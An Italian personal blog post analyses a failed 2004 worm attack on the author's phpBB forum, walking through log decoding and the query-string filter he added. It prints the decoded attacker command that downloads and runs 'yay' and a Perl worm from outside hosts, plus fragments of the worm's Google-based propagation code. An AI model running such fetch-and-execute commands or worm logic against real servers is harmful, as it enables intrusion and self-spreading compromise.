Sei in Home page » Notizie personali » Attacco hacker 2004/12/26 |
![]() |
![]() |
|||
![]() |
![]() |
Gli idioti non dormono neanche a NataleTentativo di attacco al mio sito del 2004/12/26- Analisi e soluzioniAbstract Questo articolo analizza un tentativo di attacco via phpBB sul forum presente su questo sito. Si analizza la tipologia di attacco utilizzata, una analisi del codice di attacco e le soluzioni adottate. Riassunto dell'attacco:Nome del team di hackers: Sconosciuti
Aquanto pare, gli idioti non dormono neanche a Natale. Probabile che il tipo di attacco sia simile a quello eseguito qualche giorno fa su sito di Wind e qui raccontato da punto informatico, anche se sul mio non ha dato i risultati sperati. Ma veniamo al resoconto dell'attacco. Stavo infatti per mettermi al lavoro su di un aggiornamento di un mio modulo di WebGUI quando ho deciso di dare un'occhiata al numero di visite che il mio sito aveva ricevuto durante la vigilia e il giorno di natale. Potete immaginare la mia sorpresa quando ho osservato un picco di accessi veramente troppo anomalo per non risultare sospetto, soprattutto considerando che l'enorme numero di accessi era relativo a richieste di pagine del mio forum phpBB. Visti i precedenti attacchi a tale sistema, un brivido freddo ha attraversato la mia schiena. Sono rientrati gli hacker!!! Un immediato ps xa sulla macchina su cui il mio sito è in hosting ha però in parte mitigato il mio iniziale panico, nessun processo anomalo sembrava in esecuzione sulla macchina. Sono quindi passato a visualizzare il file di log del mio sito per cercare di capire cosa stavano cercando di fare gli hackerozzi. Tra le varie cose, il file conteneva tutta una serie di righe tipo questa: ***.***.***.*** - - [26/Dec/2004:12:01:03 +0100] "GET
/phpBB2/viewtopic.php?t=27&
Cerchiamo di capirci qualcosa. Innanzitutto si tratta, a prima vista di una richiesta di visualizzare una notizia del mio forum con id = 75. Tutto la marmaglia di roba che però segue questa richiesta e soprattutto la scritta "system" contenuta nell'url deve immediatamente farci scattare un campanello di allarme. Cerchiamo di ripulire un pò l'URL sopra con l'aiuto di un piccolo script in PERL come questo #!/usr/bin/perl
Una volta data in pasto la stringa sopra a questo script il risultato è ***.***.***.*** - - [26/Dec/2004:12:01:03
+0100] "GET /phpBB2/viewtopic.php?t=27&
Ancora criptico, vediamo di dare di nuovo in pasto questa stringa al nostro script. Ora il risultato è un pò più comprensibile. ***.***.***.*** - - [26/Dec/2004:12:01:03
+0100] "GET /phpBB2/viewtopic.php?t=27&
Proviamo ad eseguire questo elenco di comandi chr da questo semplice scriptino PERL a riga di comando perl -e "print eval(<STDIN>)"
il risultato risulta essere la seguente stringa di comandi che la funzione system del PHP eseguirà da shell con i permessi dell'utente apache: cd /tmp;wget members.aol.com/newok8408/yay;./yay;wget members.aol.com/hydro000/worm.txt;perl worm.txt
Siamo infine giunti a scoprire cosa sta cercando di fare l'hacker. Uno spostamento della directory in una in cui ha i permessi di scrittura l'utente apache (/tmp), un download da un sito remoto di un programma "yay" e la sua esecuzione, il download da un'altro URL di un file di testo e l'esecuzione di questo come script di PERL. Per quanto riguarda il primo script, non posso dire cosa faccia in quanto l'URL risulta inesistente. Il secondo script l'ho invce scaricato ed andro brevemente a commentare. Il programma innanzitutto camuffa se stesso e poi esegue un fork per restare in esecuzione anche al termine della richiesta della URL stessa. #/usr/bin/perl
Ovviamente, una volta visto questo, la prima cosa che ho fatto è stato eseguire un ps xa|grep httpd
per vedere se c'erano in esecuzione dei processi /usr/bin/httpd -DSSL
e non ve ne erano, segno che, come supponevo, il tentativo di hacking non andava a buon fine. Queste poche righe di codice evidenziano però, purtroppo, una amara verità: aal nome delle variabili e dal messaggio di errore è segno evidente che gli idioti sono questa volta italiani :-( Continuando l'analisi del codice che non riporto qui interamente per ovvi motivi, evidenzia bene il perchè del nome dato a questo script. Esso infatti prova una decina di volta, generando un numero random, a richiedere a Google pagine con url "viewtopic.php?t=xx" $numero = int rand(999);
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
e ne analizza la risposta alla ricerca di siti che usano phpBB e quindi lancia un attacco a questi siti facendo cosi diventare la macchina attaccata un attaccante facendo si che l'attacco si propaghi ad altre macchine. Non contento prova anche ad interrogare Yahoo per ottenere altri siti che usano phpBB. Quindi, scoperto che questo tentativo di attacco non permetteva di eseguire comandi sul mio server, mi era rimasta solo la scocciatura che questo attacco generava una serie di page-hit "fasulli" sul mio sito, oltre a generare banda. La soluzione a questo è stata molto semplice. Visto che nel mio sito, le pagine .php, vengono pre-processate dal motore in PERL, per evitare il page-hit fasulli e per evitare futuri exploit al codice php, ho inserito un pezzo di codice nel mio motore di preprocessing php che, se rileva nella query string della pagina PHP chiamata, delle cose non proprio lecite, ritorna un bel codice di errore 404 - Access Forbidden. Cosa dire, quando non si ha altro da fare che rompere le palle agli altri, meglio sarebbe scegliersi un ponte e buttarsi di sotto. |
![]() |
|
![]() |
![]() | ||
Copyright© 1997-2006 Emiliano Bruni | Online dal 16/08/1998 con
|
Scrivimi all'indirizzo:
![]() |